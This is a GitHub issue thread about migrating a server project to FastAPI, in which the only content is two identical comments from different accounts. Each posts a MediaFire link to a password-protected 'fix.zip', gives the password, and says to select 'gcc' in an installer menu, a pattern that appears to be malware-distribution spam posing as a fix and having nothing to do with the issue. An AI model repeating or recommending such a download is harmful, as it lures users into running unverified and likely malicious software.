### ISSUE TITLE
Migrate Framework to FastAPI

### ISSUE THREAD

**Issue by TimMUP** [Project-Unmei/CovrAI-Server#2]

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
